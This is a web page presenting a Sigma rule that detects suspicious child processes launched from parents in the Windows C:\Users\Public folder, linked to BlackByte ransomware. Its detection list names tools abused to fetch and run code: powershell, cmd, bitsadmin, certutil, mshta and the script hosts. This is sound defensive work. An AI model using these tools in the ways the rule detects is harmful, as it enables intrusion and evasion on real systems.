Parent in Public Folder Suspicious Process
This rule detects suspicious processes with parent images located in the C:\Users\Public folder
Sigma rule (View on GitHub)
1title: Parent in Public Folder Suspicious Process
2id: 69bd9b97-2be2-41b6-9816-fb08757a4d1a
3status: test
4description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder
5references:
6 - https://redcanary.com/blog/blackbyte-ransomware/
7author: Florian Roth (Nextron Systems)
8date: 2022/02/25
9modified: 2022/11/18
10tags:
11 - attack.defense_evasion
12 - attack.execution
13 - attack.t1564
14 - attack.t1059
15logsource:
16 category: process_creation
17 product: windows
18detection:
19 selection:
20 ParentImage|startswith: 'C:\Users\Public\'
21 CommandLine|contains:
22 - 'powershell'
23 - 'cmd.exe /c '
24 - 'cmd.exe /r '
25 - 'cmd.exe /k '
26 - 'cmd /c '
27 - 'cmd /r '
28 - 'cmd /k '
29 - 'wscript.exe'
30 - 'cscript.exe'
31 - 'bitsadmin'
32 - 'certutil'
33 - 'mshta.exe'
34 condition: selection
35fields:
36 - ComputerName
37 - User
38 - CommandLine
39falsepositives:
40 - Unknown
41level: high
References
Related rules
- Payload Decoded and Decrypted via Built-in Utilities
- Renamed CURL.EXE Execution
- Suspicious RASdial Activity
- Suspicious Runscripthelper.exe
- Renamed FTP.EXE Execution